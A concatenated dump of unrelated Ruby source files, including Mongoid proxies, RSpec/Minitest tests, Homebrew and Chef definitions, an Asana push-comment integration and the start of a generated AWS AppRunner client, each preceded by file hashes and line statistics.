@bgs_record ||= try_and_retry_bgs_record
end
end
| 20.8 | 76 | 0.780769 |
d5f4904a02e8e3d652b794dc7dbf9e0473e27c31 | 7,224 | # frozen_string_literal: true
# encoding: utf-8
module Mongoid
module Association
# This is the superclass for all many to one and many to many association
# proxies.
class Many < Association::Proxy
include ::Enumerable
delegate :avg, :max, :min, :sum, to: :criteria
delegate :length, :size, to: :_target
# Is the association empty?
#
# @example Is the association empty??
# person.addresses.blank?
#
# @return [ true, false ] If the association is empty or not.
#
# @since 2.1.0
def blank?
size == 0
end
# Creates a new document on the references many association. This will
# save the document if the parent has been persisted.
#
# @example Create and save the new document.
# person.posts.create(:text => "Testing")
#
#
# @param [ Hash ] attributes The attributes to create with.
# @param [ Class ] type The optional type of document to create.
#
# @return [ Document ] The newly created document.
#
# @since 2.0.0.beta.1
def create(attributes = nil, type = nil, &block)
if attributes.is_a?(::Array)
attributes.map { |attrs| create(attrs, type, &block) }
else
doc = build(attributes, type, &block)
_base.persisted? ? doc.save : raise_unsaved(doc)
doc
end
end
# Creates a new document on the references many association. This will
# save the document if the parent has been persisted and will raise an
# error if validation fails.
#
# @example Create and save the new document.
# person.posts.create!(:text => "Testing")
#
# @param [ Hash ] attributes The attributes to create with.
# @param [ Class ] type The optional type of document to create.
#
# @raise [ Errors::Validations ] If validation failed.
#
# @return [ Document ] The newly created document.
#
# @since 2.0.0.beta.1
def create!(attributes = nil, type = nil, &block)
if attributes.is_a?(::Array)
attributes.map { |attrs| create!(attrs, type, &block) }
else
doc = build(attributes, type, &block)
_base.persisted? ? doc.save! : raise_unsaved(doc)
doc
end
end
# Find the first document given the conditions, or creates a new document
# with the conditions that were supplied.
#
# @example Find or create.
# person.posts.find_or_create_by(:title => "Testing")
#
# @param [ Hash ] attrs The attributes to search or create with.
# @param [ Class ] type The optional type of document to create.
#
# @return [ Document ] An existing document or newly created one.
def find_or_create_by(attrs = {}, type = nil, &block)
find_or(:create, attrs, type, &block)
end
# Find the first document given the conditions, or creates a new document
# with the conditions that were supplied. This will raise an error if validation fails.
#
# @example Find or create.
# person.posts.find_or_create_by!(:title => "Testing")
#
# @param [ Hash ] attrs The attributes to search or create with.
# @param [ Class ] type The optional type of document to create.
#
# @raise [ Errors::Validations ] If validation failed.
#
# @return [ Document ] An existing document or newly created one.
def find_or_create_by!(attrs = {}, type = nil, &block)
find_or(:create!, attrs, type, &block)
end
# Find the first +Document+ given the conditions, or instantiates a new document
# with the conditions that were supplied
#
# @example Find or initialize.
# person.posts.find_or_initialize_by(:title => "Test")
#
# @param [ Hash ] attrs The attributes to search or initialize with.
# @param [ Class ] type The optional subclass to build.
#
# @return [ Document ] An existing document or newly instantiated one.
def find_or_initialize_by(attrs = {}, type = nil, &block)
find_or(:build, attrs, type, &block)
end
# This proxy can never be nil.
#
# @example Is the proxy nil?
# relation.nil?
#
# @return [ false ] Always false.
#
# @since 2.0.0
def nil?
false
end
# Since method_missing is overridden we should override this as well.
#
# @example Does the proxy respond to the method?
# relation.respond_to?(:name)
#
# @param [ Symbol ] name The method name.
# @param [ true, false ] include_private Whether to include private methods.
#
# @return [ true, false ] If the proxy responds to the method.
#
# @since 2.0.0
def respond_to?(name, include_private = false)
[].respond_to?(name, include_private) ||
klass.respond_to?(name, include_private) || super
end
# This is public access to the association's criteria.
#
# @example Get the scoped association.
# relation.scoped
#
# @return [ Criteria ] The scoped criteria.
#
# @since 2.1.0
def scoped
criteria
end
# Gets the document as a serializable hash, used by ActiveModel's JSON and
# XML serializers. This override is just to be able to pass the :include
# and :except options to get associations in the hash.
#
# @example Get the serializable hash.
# relation.serializable_hash
#
# @param [ Hash ] options The options to pass.
#
# @option options [ Symbol ] :include What associations to include
# @option options [ Symbol ] :only Limit the fields to only these.
# @option options [ Symbol ] :except Dont include these fields.
#
# @return [ Hash ] The documents, ready to be serialized.
#
# @since 2.0.0.rc.6
def serializable_hash(options = {})
_target.map { |document| document.serializable_hash(options) }
end
# Get a criteria for the embedded documents without the default scoping
# applied.
#
# @example Get the unscoped criteria.
# person.addresses.unscoped
#
# @return [ Criteria ] The unscoped criteria.
#
# @since 2.4.0
def unscoped
criteria.unscoped
end
private
def _session
_base.send(:_session)
end
# Find the first object given the supplied attributes or create/initialize it.
#
# @example Find or create|initialize.
# person.addresses.find_or(:create, :street => "Bond")
#
# @param [ Symbol ] method The method name, create or new.
# @param [ Hash ] attrs The attributes to search or build with.
# @param [ Class ] type The optional subclass to build.
#
# @return [ Document ] A matching document or a new/created one.
def find_or(method, attrs = {}, type = nil, &block)
attrs["_type"] = type.to_s if type
where(attrs).first || send(method, attrs, type, &block)
end
end
end
end
| 33.6 | 93 | 0.599252 |
ac833395e3277b25256f4a8a50f2ec3c181c5097 | 2,263 | # frozen_string_literal: true
require 'spec_helper'
require 'request_store'
RSpec.describe ServiceProtocol::Redis::Client do
module TestNamespace
# Test class
class TestOperation
class << self
include ServiceProtocol::Redis::Connection
def call(params)
if RequestStore[:operator]
{ equals: params[:one].send(RequestStore[:operator], params[:two]) }
else
sleep(0.25)
redis.set params[:key], params[:value]
{}
end
end
end
end
end
let(:queue_name) { 'api.service' }
let(:operation) { "#{queue_name}:test_namespace/test_operation" }
describe 'integration' do
include ServiceProtocol::Redis::Connection
let(:server) { ServiceProtocol::Redis::Server.new(queue_name) }
let(:fork_server) do
fork { server.run }
end
let(:default_meta) do
{ user_id: 1, tenant_id: 1 }
end
let(:meta) do
default_meta
end
before do
RequestStore.clear!
redis.flushdb
fork_server
end
after do
sleep(1)
expect_clean_db
Process.kill(9, fork_server)
end
describe '.call' do
let(:params) do
{ one: 1, two: 2 }
end
let(:meta) do
default_meta.merge(operator: '+')
end
let(:output) do
described_class.call(operation, params, meta)
end
it 'waits for a response' do
expect(output).to eq(equals: 3)
end
it 'server does not cache requests and responses' do
params[:one] = 2
expect(output).to eq(equals: 4)
end
end
describe '.queue' do
let(:params) do
{ key: 'x', value: 'y' }
end
let(:output) do
described_class.queue(operation, params, meta)
end
it 'process asyncronously' do
expect(output).to eq({})
expect(set_value).to eq(nil)
sleep(1)
expect(set_value).to eq(params[:value])
redis.del params[:key]
end
private
def set_value
redis.get(params[:key])
end
end
def expect_clean_db
# expect(redis.lpop('api.service:processing')).to eq(nil)
expect(redis.keys).to eq []
end
end
end
| 20.026549 | 80 | 0.576668 |
d5ad67b01cb4fca15cabf9ef5d164c4c03e3aa99 | 57 | module InheritedResources
VERSION = '1.5.1'.freeze
end
| 14.25 | 26 | 0.754386 |
abd6e5a3dc7e4993842c2f522cc2d509574f0b43 | 2,451 |
###
# This Ruby source file was generated by test-to-ruby.xsl
# and is a derived work from the source document.
# The source document contained the following notice:
=begin
Copyright (c) 2001 World Wide Web Consortium,
(Massachusetts Institute of Technology, Institut National de
Recherche en Informatique et en Automatique, Keio University). All
Rights Reserved. This program is distributed under the W3C's Software
Intellectual Property License. This program is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.
See W3C License http://www.w3.org/Consortium/Legal/ for more details.
=end
#
require File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..', 'helper'))
###
# The createTFoot() method creates a table footer row or returns
# an existing one.
# Try to create a new TFOOT element on the second TABLE element.
# Since a TFOOT element already exists in the TABLE element a new
# TFOOT element is not created and information from the already
# existing TFOOT element is returned.
# @author NIST
# @author Rick Rivello
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-html#ID-8453710]
##
DOMTestCase('HTMLTableElement23') do
###
# Constructor.
# @param factory document factory, may not be null
# @throws org.w3c.domts.DOMTestIncompatibleException Thrown if test is not compatible with parser configuration
##
def setup
##
## check if loaded documents are supported for content type
##
contentType = getContentType()
preload(contentType, "table", true)
end
###
# Runs the test case.
# @throws Throwable Any uncaught exception causes test to fail
#
def test_HTMLTableElement23
nodeList = nil
testNode = nil
vsection = nil
newFoot = nil
valign = nil
doc = nil
doc = load_document("table", true)
nodeList = doc.getElementsByTagName("table")
assertSize("Asize", 3, nodeList)
testNode = nodeList.item(1)
newFoot = testNode.createTFoot()
vsection = testNode.tFoot()
valign = vsection.align()
assert_equal("center", valign, "alignLink")
end
###
# Gets URI that identifies the test.
# @return uri identifier of test
#
def targetURI
"http://www.w3.org/2001/DOM-Test-Suite/level1/html/HTMLTableElement23"
end
end
| 29.178571 | 113 | 0.705426 |
d5ddce1482e5bbc851ab390ac32c656baed92a60 | 422 | require 'formula'
class Blitzwave < Formula
homepage 'http://oschulz.github.io/blitzwave'
url 'https://github.com/downloads/oschulz/blitzwave/blitzwave-0.7.1.tar.gz'
sha1 '2a53f1a9b7967897415afce256f02693a35f380e'
depends_on 'blitz'
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
end
| 26.375 | 77 | 0.677725 |
ab2ccfd304355f9c5ce5318e42cf1b217d039148 | 121 | class AddUserIdToOrders < ActiveRecord::Migration[5.0]
def change
add_column :orders, :user_id, :integer
end
end
| 20.166667 | 54 | 0.743802 |
3998d3719961dfa9509b2f8442bafce756499966 | 2,739 | require 'asana'
class AsanaService < Service
prop_accessor :api_key, :restrict_to_branch
validates :api_key, presence: true, if: :activated?
def title
'Asana'
end
def description
'Asana - Teamwork without email'
end
def help
'This service adds commit messages as comments to Asana tasks.
Once enabled, commit messages are checked for Asana task URLs
(for example, `https://app.asana.com/0/123456/987654`) or task IDs
starting with # (for example, `#987654`). Every task ID found will
get the commit comment added to it.
You can also close a task with a message containing: `fix #123456`.
You can create a Personal Access Token here:
http://app.asana.com/-/account_api'
end
def self.to_param
'asana'
end
def fields
[
{
type: 'text',
name: 'api_key',
placeholder: 'User Personal Access Token. User must have access to task, all comments will be attributed to this user.',
required: true
},
{
type: 'text',
name: 'restrict_to_branch',
placeholder: 'Comma-separated list of branches which will be automatically inspected. Leave blank to include all branches.'
}
]
end
def self.supported_events
%w(push)
end
def client
@_client ||= begin
Asana::Client.new do |c|
c.authentication :access_token, api_key
end
end
end
def execute(data)
return unless supported_events.include?(data[:object_kind])
# check the branch restriction is poplulated and branch is not included
branch = Gitlab::Git.ref_name(data[:ref])
branch_restriction = restrict_to_branch.to_s
if branch_restriction.length > 0 && branch_restriction.index(branch).nil?
return
end
user = data[:user_name]
project_name = project.full_name
data[:commits].each do |commit|
push_msg = "#{user} 推送分支 #{branch} of #{project_name} ( #{commit[:url]} ):"
check_commit(commit[:message], push_msg)
end
end
def check_commit(message, push_msg)
# matches either:
# - #1234
# - https://app.asana.com/0/0/1234
# optionally preceded with:
# - fix/ed/es/ing
# - close/s/d
# - closing
issue_finder = %r{(fix\w*|clos[ei]\w*+)?\W*(?:https://app\.asana\.com/\d+/\d+/(\d+)|#(\d+))}i
message.scan(issue_finder).each do |tuple|
# tuple will be
# [ 'fix', 'id_from_url', 'id_from_pound' ]
taskid = tuple[2] || tuple[1]
begin
task = Asana::Task.find_by_id(client, taskid)
task.add_comment(text: "#{push_msg} #{message}")
if tuple[0]
task.update(completed: true)
end
rescue => e
Rails.logger.error(e.message)
next
end
end
end
end
| 25.361111 | 131 | 0.636729 |
085d528e5b0ccb7f842d9e4f6a53cc94d4101c95 | 384 | if ENV['MY_RUBY_HOME'] && ENV['MY_RUBY_HOME'].include?('rvm')
begin
require 'rvm'
RVM.use_from_path! File.dirname(File.dirname(__FILE__))
rescue LoadError
raise "RVM gem is currently unavailable."
end
end
# If you're not using Bundler at all, remove lines bellow
ENV['BUNDLE_GEMFILE'] = File.expand_path('../Gemfile', File.dirname(__FILE__))
require 'bundler/setup' | 32 | 78 | 0.723958 |
4a3fe84d7f73dc82917855d5ffa9b9c5b4841949 | 954 | require 'spec_helper'
describe Ci::BuildScheduleWorker do
subject { described_class.new.perform(build.id) }
context 'when build is found' do
context 'when build is scheduled' do
let(:build) { create(:ci_build, :scheduled) }
it 'executes RunScheduledBuildService' do
expect_any_instance_of(Ci::RunScheduledBuildService)
.to receive(:execute).once
subject
end
end
context 'when build is not scheduled' do
let(:build) { create(:ci_build, :created) }
it 'executes RunScheduledBuildService' do
expect_any_instance_of(Ci::RunScheduledBuildService)
.not_to receive(:execute)
subject
end
end
end
context 'when build is not found' do
let(:build) { build_stubbed(:ci_build, :scheduled) }
it 'does nothing' do
expect_any_instance_of(Ci::RunScheduledBuildService)
.not_to receive(:execute)
subject
end
end
end
| 23.268293 | 60 | 0.666667 |
01bb6933a5c9d5a0c6b65e9e71b9eccc4553defd | 642 | # frozen_string_literal: true
describe 'Node new page', type: :feature do
let(:current_user) { create :user }
before do
create :zone, default: true
create :status, name: 'Active'
login_as current_user
visit new_node_path
end
it { expect(page).to have_content 'New Node' }
it 'allows a node to be created' do
fill_in 'node_name', with: 'Spec Node'
select 'Active', from: 'node_status_id'
click_button 'Create'
expect(page).to have_content 'Spec Node'
end
it 'shows an error if node creation fails' do
click_button 'Create'
expect(page).to have_content "Name can't be blank"
end
end
| 23.777778 | 54 | 0.688474 |
91679c9dc2ccf63cb40829e2635672a5ff0bcbfa | 781 | require 'test_helper'
class GeoCertsTest < Test::Unit::TestCase
context 'GeoCerts' do
should 'use the sandbox host' do
setting(GeoCerts, :sandbox, :to => true) do
assert_equal('https://sandbox.geocerts.com', GeoCerts.host)
end
end
should 'use the production host' do
setting(GeoCerts, :sandbox, :to => false) do
assert_equal('https://www.geocerts.com', GeoCerts.host)
end
end
should 'use the given host' do
setting(GeoCerts, :host, :to => 'test.com', :back => nil) do
assert_equal('test.com', GeoCerts.host)
end
setting(GeoCerts, :host, :to => 'test.com:8000', :back => nil) do
assert_equal('test.com:8000', GeoCerts.host)
end
end
end
end
| 24.40625 | 71 | 0.596671 |
ff0a679380b1fd11463627c64c7a68cbde9135d3 | 1,192 | # frozen_string_literal: true
require './test_helper'
class PokedexTest < Minitest::Test
def test_that_it_has_a_version_number
refute_nil ::Pokedex::VERSION
end
def test_fin_pokemon_with_filter
VCR.use_cassette('Find_pokemon') do
pokemon = Pokedex.Find_pokemon('p', 300)
assert_instance_of Array, pokemon
end
end
def test_find_pokemon_with_filter_equal
VCR.use_cassette('Find_pokemon') do
pokemon = Pokedex.Find_pokemon('z')
assert_equal ["zubat"], pokemon
end
end
def test_get_ability
VCR.use_cassette('Ability_Skills') do
pokemon = Pokedex.Ability_Skills(5)
assert_instance_of Hash, pokemon
end
end
def test_get_type
VCR.use_cassette('Type_Skills') do
pokemon = Pokedex.Type_Skills(5)
assert_instance_of Hash, pokemon
end
end
def test_get_pokemon
VCR.use_cassette('Pokemon') do
pokemon = Pokedex.Pokemon('pikachu')
assert_instance_of Hash, pokemon
end
end
def test_get_pokemon_with_filter
VCR.use_cassette('Pokemon_filter') do
pokemon = Pokedex.Pokemon_filter('pikachu', 'moves')
assert_instance_of Array, pokemon
end
end
end
| 22.074074 | 58 | 0.713087 |
1dba133343acbd0800de3d3ff85369dabc692cf7 | 678 | cask "pingplotter" do
version "5.23.2"
sha256 :no_check
url "https://www.pingplotter.com/downloads/pingplotter_osx.zip"
name "PingPlotter"
desc "Network monitoring tool"
homepage "https://www.pingplotter.com/"
livecheck do
url "https://www.pingplotter.com/download/release-notes"
regex(/<h3>v?(\d+(?:\.\d+)+)[[:space:]<]/i)
end
app "PingPlotter.app"
uninstall quit: "com.pingman.pingplotter.mac"
zap trash: [
"~/Library/Application Support/PingPlotter",
"~/Library/Logs/PingPlotter",
"~/Library/Preferences/com.pingman.pingplotter.mac.plist",
"~/Library/Saved Application State/com.pingman.pingplotter.mac.savedState",
]
end
| 26.076923 | 79 | 0.69469 |
ede4bb1069f856c37195d465d449ee360c107704 | 1,510 | class Guide
include Mongoid::Document
include Mongoid::Paperclip
include Mongoid::Slug
searchkick
is_impressionable counter_cache: true,
column_name: :impressions_field,
unique: :session_hash
field :impressions_field, default: 0
belongs_to :crop, counter_cache: true
belongs_to :user
has_many :stages
has_many :requirements
field :name
field :location
field :overview
field :practices, type: Array
validates_presence_of :user, :crop, :name
has_mongoid_attached_file :featured_image,
default_url: '/assets/leaf-grey.png'
validates_attachment_size :featured_image, in: 1.byte..2.megabytes
validates_attachment :featured_image,
content_type: { content_type:
['image/jpg', 'image/jpeg', 'image/png', 'image/gif'] }
handle_asynchronously :featured_image=
def owned_by?(current_user)
!!(current_user && user == current_user)
end
def search_data
as_json only: [:name, :overview, :crop_id]
end
def compatibility_score
# Make our random scores consistent based on the first character of the crop name
# srand(name[0].ord)
# rand(100);
nil
end
def compatibility_label
''
# TODO:
# score = compatibility_score
# if score.nil?
# return ''
# elsif score > 75
# return 'high'
# elsif score > 50
# return 'medium'
# else
# return 'low'
# end
end
slug :name
end
| 22.878788 | 85 | 0.641722 |
bfb2e321afc74035e7cd8bf8cd1a4a827d18d0fc | 664 | require 'rubygems'
require 'blather/client/dsl'
$stdout.sync = true
module Ping
extend Blather::DSL
def self.run; client.run; end
setup '[email protected]', 'password'
status :from => /pong@your\.jabber\.server/ do |s|
puts "serve!"
say s.from, 'ping'
end
message :chat?, :body => 'pong' do |m|
puts "ping!"
say m.from, 'ping'
end
end
module Pong
extend Blather::DSL
def self.run; client.run; end
setup '[email protected]', 'password'
message :chat?, :body => 'ping' do |m|
puts "pong!"
say m.from, 'pong'
end
end
trap(:INT) { EM.stop }
trap(:TERM) { EM.stop }
EM.run do
Ping.run
Pong.run
end
| 17.025641 | 52 | 0.629518 |
4a257b11159dfdd4e6032513339ce41bb3498652 | 471 | # frozen_string_literal: true
require "zombie_check/core_ext/ennumerable"
require "zombie_check/core_ext/string"
require "zombie_check/version"
require "zombie_check/ping"
require "zombie_check/ping/checker"
require "zombie_check/ping/checker_report"
require "zombie_check/ping/host_stat"
require "zombie_check/ping/ping_sender"
require "zombie_check/ping/ping_sender/net_ping"
require "zombie_check/ping/ping_sender/unix_ping"
require "net/ping"
module ZombieCheck
end
| 29.4375 | 49 | 0.842887 |
3878e4f182511a08b96a37b8bb8260efb7152dc2 | 873 | # encoding: utf-8
require 'spec_helper'
describe NexaasID::Configuration do
subject do
described_class.build do |c|
c.url = 'http://some/where'
c.user_agent = 'My App v1.0'
c.application_token = 'some-app-token'
c.application_secret = 'some-app-secret'
end
end
it "should use the production Nexaas ID URL by default" do
expect(subject.url).to eq('http://some/where')
end
it "should use a default user agent" do
expect(subject.user_agent).to eq('My App v1.0')
end
it 'generates an URL to a resource' do
configuration = subject
expect(configuration.url_for('/api/v1/profile')).
to eq('http://some/where/api/v1/profile')
configuration.url = 'https://sandbox.id.nexaas.com/'
expect(configuration.url_for('/api/v1/profile'))
.to eq('https://sandbox.id.nexaas.com/api/v1/profile')
end
end
| 26.454545 | 60 | 0.670103 |
288564687847ccf4f1da7cf773642dd8aa645471 | 2,697 | #
# Cookbook:: veeam
# Spec:: standalone_complete
#
# maintainer:: Exosphere Data, LLC
# maintainer_email:: [email protected]
#
# Copyright:: 2020, Exosphere Data, LLC, All Rights Reserved.
require 'spec_helper'
describe 'veeam::standalone_complete' do
before do
mock_windows_system_framework # Windows Framework Helper from 'spec/windows_helper.rb'
stub_command('sc.exe query W3SVC').and_return 1
stub_data_bag_item('veeam', 'license').and_return(nil)
end
context 'Run recipe' do
platforms = {
'windows' => {
'versions' => %w(2012 2012R2 2016)
}
}
platforms.each do |platform, components|
components['versions'].each do |version|
context "On #{platform} #{version}" do
before do
Fauxhai.mock(platform: platform, version: version)
node.override['veeam']['build'] = '9.5.0.1536'
end
let(:runner) do
ChefSpec::SoloRunner.new(platform: platform, version: version, file_cache_path: '/tmp/cache')
end
let(:node) { runner.node }
let(:chef_run) { runner.converge(described_recipe) }
it 'converges successfully' do
expect { chef_run }.not_to raise_error
expect(chef_run).to install_veeam_prerequisites('Install Veeam Prerequisites')
expect(chef_run).to install_veeam_catalog('Install Veeam Backup Catalog')
expect(chef_run).to install_veeam_console('Install Veeam Backup Console')
expect(chef_run).to install_veeam_server('Install Veeam Backup Server')
expect(chef_run).to install_veeam_explorer('Install Veeam Backup Explorers')
expect(chef_run).to install_veeam_upgrade('9.5.0.1536').with(package_url: node['veeam']['installer']['update_url'])
end
end
end
end
end
context 'Does not install' do
platforms = {
'windows' => {
'versions' => %w(2008R2) # Unable to test plain Win2008 since Fauxhai doesn't have a template for 2008
},
'ubuntu' => {
'versions' => %w(16.04)
}
}
platforms.each do |platform, components|
components['versions'].each do |version|
context "On #{platform} #{version}" do
before do
Fauxhai.mock(platform: platform, version: version)
end
let(:chef_run) do
ChefSpec::SoloRunner.new(platform: platform, version: version).converge(described_recipe)
end
it 'raises an exception' do
expect { chef_run }.to raise_error(ArgumentError, 'This recipe requires a Windows 2012 or higher host!')
end
end
end
end
end
end
| 35.025974 | 127 | 0.630701 |
3944e965fe49427c08951291e4acea85337ad5ce | 376 | require "bundler/setup"
require "notable/covid/deaths"
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 25.066667 | 66 | 0.755319 |
e8818a62ae00e872db04e3cc8312aaeaf6b158cb | 798 | #
# Cookbook Name:: splunk
# Recipe:: install_forwarder
#
# Author: Joshua Timberman <[email protected]>
# Copyright (c) 2014, Chef Software, Inc <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
splunk_installer 'splunkforwarder' do
url node['splunk']['forwarder']['url']
end
| 33.25 | 74 | 0.750627 |
288069cb6061d2318b5ba56eb715c8197e567210 | 93,049 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/json_rpc.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:apprunner)
module Aws::AppRunner
# An API client for AppRunner. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::AppRunner::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :apprunner
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::JsonRpc)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::SharedCredentials` - Used for loading static credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# * `Aws::AssumeRoleWebIdentityCredentials` - Used when you need to
# assume a role after providing credentials via the web.
#
# * `Aws::SSOCredentials` - Used for loading credentials from AWS SSO using an
# access token generated from `aws login`.
#
# * `Aws::ProcessCredentials` - Used for loading credentials from a
# process that outputs to stdout.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::ECSCredentials` - Used for loading credentials from
# instances running in ECS.
#
# * `Aws::CognitoIdentityCredentials` - Used for loading credentials
# from the Cognito Identity service.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2/ECS IMDS instance profile - When used by default, the timeouts
# are very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentails` or `Aws::ECSCredentials` to
# enable retries and extended timeouts.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficent client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
